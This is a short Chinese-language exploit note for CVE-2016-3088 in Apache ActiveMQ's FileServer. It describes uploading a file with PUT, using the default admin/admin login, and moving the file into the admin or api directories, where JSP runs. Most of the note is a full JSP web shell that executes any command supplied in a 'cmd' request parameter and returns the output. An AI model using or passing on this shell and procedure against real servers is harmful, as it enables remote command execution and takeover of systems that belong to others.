漏洞利用 CVE 2016 3088 ActiveMQ GetShell Exploit
漏洞编号: CVE-2016-3088
漏洞原理: ActiveMQ 中的 FileServer 服务允许用户通过 PUT/MOVE方法上传文件到指定目录
影响版本: Apache ActiveMQ 5.0.0 – 5.13.2
PUT /fileserver/%20/%20
上传文件和移动文件均需登陆,默认帐密admin/admin
<%@ page import="java.io.*"%>
<%
out.print("Hello");
String strcmd = request.getParameter("cmd");
String line =null;
Process p=Runtime.getRuntime().exec(strcmd);
InputStream is = p.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while((line =br.readLine())!=null){
out.print(line+"
");
}
%>
根目录和fileserver均不解析JSP文件,好在admin和api目录可以解析
